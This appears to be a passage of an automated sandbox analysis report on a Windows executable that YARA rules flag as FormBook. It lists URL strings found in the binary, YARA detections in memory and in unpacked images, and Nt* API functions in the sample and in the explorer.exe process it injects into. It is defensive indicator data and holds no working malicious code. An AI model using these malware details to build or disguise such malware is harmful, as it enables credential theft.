          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: 0O9BJfVJi6fEMoS.exeString found in binary or memory: http://www.esvstudybible.org/search?q=
          Source: 0O9BJfVJi6fEMoS.exeString found in binary or memory: http://www.esvstudybible.org/search?q=Whttp://www.blueletterbible.org/Bible.cfm?b=
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 0000000B.00000002.915089078.00000000056C2000.00000004.00000001.sdmpString found in binary or memory: https://www.hugedomains.com/domain_profile.cfm?d=grandwhale&e=com
          Source: explorer.exe, 0000000B.00000002.915089078.00000000056C2000.00000004.00000001.sdmpString found in binary or memory: https://www.hugedomains.com/domain_profile.cfm?d=grandwhale&e=com

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_004181B0 NtCreateFile,6_2_004181B0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00418260 NtReadFile,6_2_00418260
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_004182E0 NtClose,6_2_004182E0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00418390 NtAllocateVirtualMemory,6_2_00418390
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_004181AC NtCreateFile,6_2_004181AC
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00418262 NtReadFile,6_2_00418262
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_004182DA NtClose,6_2_004182DA
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_01679910
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016799A0 NtCreateSection,LdrInitializeThunk,6_2_016799A0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679860 NtQuerySystemInformation,LdrInitializeThunk,6_2_01679860
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679840 NtDelayExecution,LdrInitializeThunk,6_2_01679840
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016798F0 NtReadVirtualMemory,LdrInitializeThunk,6_2_016798F0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679A50 NtCreateFile,LdrInitializeThunk,6_2_01679A50
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679A20 NtResumeThread,LdrInitializeThunk,6_2_01679A20
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679A00 NtProtectVirtualMemory,LdrInitializeThunk,6_2_01679A00
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679540 NtReadFile,LdrInitializeThunk,6_2_01679540
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016795D0 NtClose,LdrInitializeThunk,6_2_016795D0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679710 NtQueryInformationToken,LdrInitializeThunk,6_2_01679710
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679FE0 NtCreateMutant,LdrInitializeThunk,6_2_01679FE0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016797A0 NtUnmapViewOfSection,LdrInitializeThunk,6_2_016797A0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679780 NtMapViewOfSection,LdrInitializeThunk,6_2_01679780
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_01679660
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016796E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_016796E0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679950 NtQueueApcThread,6_2_01679950
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016799D0 NtCreateProcessEx,6_2_016799D0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0167B040 NtSuspendThread,6_2_0167B040
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679820 NtEnumerateKey,6_2_01679820
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016798A0 NtWriteVirtualMemory,6_2_016798A0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679B00 NtSetValueKey,6_2_01679B00
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0167A3B0 NtGetContextThread,6_2_0167A3B0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679A10 NtQuerySection,6_2_01679A10
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679A80 NtOpenDirectoryObject,6_2_01679A80
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679560 NtWriteFile,6_2_01679560
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679520 NtWaitForSingleObject,6_2_01679520
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0167AD30 NtSetContextThread,6_2_0167AD30
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016795F0 NtQueryInformationFile,6_2_016795F0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679760 NtOpenProcess,6_2_01679760
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0167A770 NtOpenThread,6_2_0167A770
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679770 NtSetInformationFile,6_2_01679770
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679730 NtQueryVirtualMemory,6_2_01679730
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0167A710 NtOpenProcessToken,6_2_0167A710
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679670 NtQueryInformationProcess,6_2_01679670
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679650 NtQueryValueKey,6_2_01679650
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679610 NtEnumerateValueKey,6_2_01679610
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016796D0 NtCreateKey,6_2_016796D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_05079910
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079540 NtReadFile,LdrInitializeThunk,11_2_05079540
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050799A0 NtCreateSection,LdrInitializeThunk,11_2_050799A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050795D0 NtClose,LdrInitializeThunk,11_2_050795D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079840 NtDelayExecution,LdrInitializeThunk,11_2_05079840
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079860 NtQuerySystemInformation,LdrInitializeThunk,11_2_05079860
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079710 NtQueryInformationToken,LdrInitializeThunk,11_2_05079710
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079780 NtMapViewOfSection,LdrInitializeThunk,11_2_05079780
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079FE0 NtCreateMutant,LdrInitializeThunk,11_2_05079FE0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079A50 NtCreateFile,LdrInitializeThunk,11_2_05079A50
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079650 NtQueryValueKey,LdrInitializeThunk,11_2_05079650
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079660 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_05079660
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050796D0 NtCreateKey,LdrInitializeThunk,11_2_050796D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050796E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_050796E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079520 NtWaitForSingleObject,11_2_05079520
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0507AD30 NtSetContextThread,11_2_0507AD30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079950 NtQueueApcThread,11_2_05079950
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079560 NtWriteFile,11_2_05079560
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050799D0 NtCreateProcessEx,11_2_050799D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050795F0 NtQueryInformationFile,11_2_050795F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079820 NtEnumerateKey,11_2_05079820
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0507B040 NtSuspendThread,11_2_0507B040
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050798A0 NtWriteVirtualMemory,11_2_050798A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050798F0 NtReadVirtualMemory,11_2_050798F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079B00 NtSetValueKey,11_2_05079B00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0507A710 NtOpenProcessToken,11_2_0507A710
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079730 NtQueryVirtualMemory,11_2_05079730
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079760 NtOpenProcess,11_2_05079760
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079770 NtSetInformationFile,11_2_05079770
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0507A770 NtOpenThread,11_2_0507A770
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050797A0 NtUnmapViewOfSection,11_2_050797A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0507A3B0 NtGetContextThread,11_2_0507A3B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079A00 NtProtectVirtualMemory,11_2_05079A00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079610 NtEnumerateValueKey,11_2_05079610
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079A10 NtQuerySection,11_2_05079A10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079A20 NtResumeThread,11_2_05079A20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079670 NtQueryInformationProcess,11_2_05079670
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079A80 NtOpenDirectoryObject,11_2_05079A80
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_009881B0 NtCreateFile,11_2_009881B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_009882E0 NtClose,11_2_009882E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00988260 NtReadFile,11_2_00988260
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00988390 NtAllocateVirtualMemory,11_2_00988390
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_009881AC NtCreateFile,11_2_009881AC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_009882DA NtClose,11_2_009882DA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00988262 NtReadFile,11_2_00988262
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 0_2_0103D20C0_2_0103D20C
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 0_2_0103F2C00_2_0103F2C0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 0_2_0103F2D00_2_0103F2D0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_004010296_2_00401029
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_004010306_2_00401030
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00408C4B6_2_00408C4B
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00408C506_2_00408C50
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0041B5366_2_0041B536
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00402D906_2_00402D90
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0041C5B76_2_0041C5B7
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0041B7D26_2_0041B7D2
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00402FB06_2_00402FB0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016541206_2_01654120
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163F9006_2_0163F900
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F10026_2_016F1002
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_017028EC6_2_017028EC
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016620A06_2_016620A0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_017020A86_2_017020A8
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164B0906_2_0164B090
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01702B286_2_01702B28
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FDBD26_2_016FDBD2
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166EBB06_2_0166EBB0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_017022AE6_2_017022AE
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01701D556_2_01701D55
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01630D206_2_01630D20
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01702D076_2_01702D07
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164D5E06_2_0164D5E0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_017025DD6_2_017025DD
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016625816_2_01662581
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FD4666_2_016FD466
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164841F6_2_0164841F
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01701FF16_2_01701FF1
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01656E306_2_01656E30
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FD6166_2_016FD616
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01702EF76_2_01702EF7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503F90011_2_0503F900
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05102D0711_2_05102D07
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05030D2011_2_05030D20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0505412011_2_05054120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05101D5511_2_05101D55
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506258111_2_05062581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_051025DD11_2_051025DD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504D5E011_2_0504D5E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F100211_2_050F1002
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504841F11_2_0504841F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504B09011_2_0504B090
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050620A011_2_050620A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_051020A811_2_051020A8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_051028EC11_2_051028EC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05102B2811_2_05102B28
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506EBB011_2_0506EBB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050FDBD211_2_050FDBD2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05101FF111_2_05101FF1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05056E3011_2_05056E30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_051022AE11_2_051022AE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05102EF711_2_05102EF7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00978C5011_2_00978C50
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00978C4B11_2_00978C4B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00972D9011_2_00972D90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0098C5B711_2_0098C5B7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0098B53611_2_0098B536
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00972FB011_2_00972FB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 0503B150 appears 35 times
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: String function: 0163B150 appears 35 times
          Source: 0O9BJfVJi6fEMoS.exeBinary or memory string: OriginalFilename vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.686761788.00000000006E2000.00000002.00020000.sdmpBinary or memory string: OriginalFilename5uogbG vs 0O9BJfVJi6fEMoS.exe
